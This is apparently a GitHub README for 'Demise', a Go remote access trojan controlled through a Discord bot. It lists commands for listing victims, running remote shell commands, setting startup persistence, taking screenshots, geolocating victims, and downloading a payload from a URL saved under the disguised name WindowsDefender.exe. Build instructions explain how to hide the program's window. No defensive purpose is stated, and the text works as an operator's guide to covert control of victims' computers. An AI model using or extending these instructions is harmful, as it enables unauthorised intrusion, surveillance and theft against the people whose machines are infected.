pwnengine / Demise

Demise is Golang malware that uses Discord for communication.

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

Demise

Demise is Golang malware that uses Discord for communication.

image

Demo

image

Commands

show victims connected

$victims

extract a zip file

$unzip <.zip file on drive>

Example:

$unzip DESKTOP-2HJUUK6\Tod main.zip C:\msys64\home\Tod\projects\go\src\github.com\0xSegFaulted\

run Demise on startup

$startup

Example

$startup DESKTOP-2HJUUK6\Tod

run an executable (some executables require admin)

$run

Example

$run DESKTOP-2HJUUK6\Tod file.exe

download file

$dl

Example

$dl DESKTOP-2HJUUK6\Tod http://somesite.com/payload.exe WindowsDefender.exe

run commands

$shell <flags... optional>

Example

$shell DESKTOP-2HJUUK6\Tod whoami

screenshot desktop

$ss

Example

$ss DESKTOP-2HJUUK6\Tod

get IP

$ip

Example

$ip DESKTOP-2HJUUK6\Tod

kill session

$kill

$kill DESKTOP-2HJUUK6\Tod

geolocate

$geoloc

$geoloc DESKTOP-2HJUUK6\Tod

HOWTO

  1. Download the source code
  2. Download golang https://go.dev choose the correct install for your os
  3. make a server (this is a discord bot RAT)
  4. make a bot. I won't show you how because there are many tutorial on youtube https://www.youtube.com/watch?v=7A-bnPlxj4k&t=20s
  5. add the bot to your server and make a new text channel in your server
  6. copy your bot's token and the id of the text channel you just created image
  7. put the channel id here at the beginning of the source code image
  8. put your bot's token here
  9. compile with a command similiar to this one "go build -ldflags="-s -w -H=windowsgui" ." -H=windowsgui will hide the window

if the bot doesn't respond to commands change your intents

About

Demise is Golang malware that uses Discord for communication.

License:GNU General Public License v3.0


Languages

Language:Go 100.0%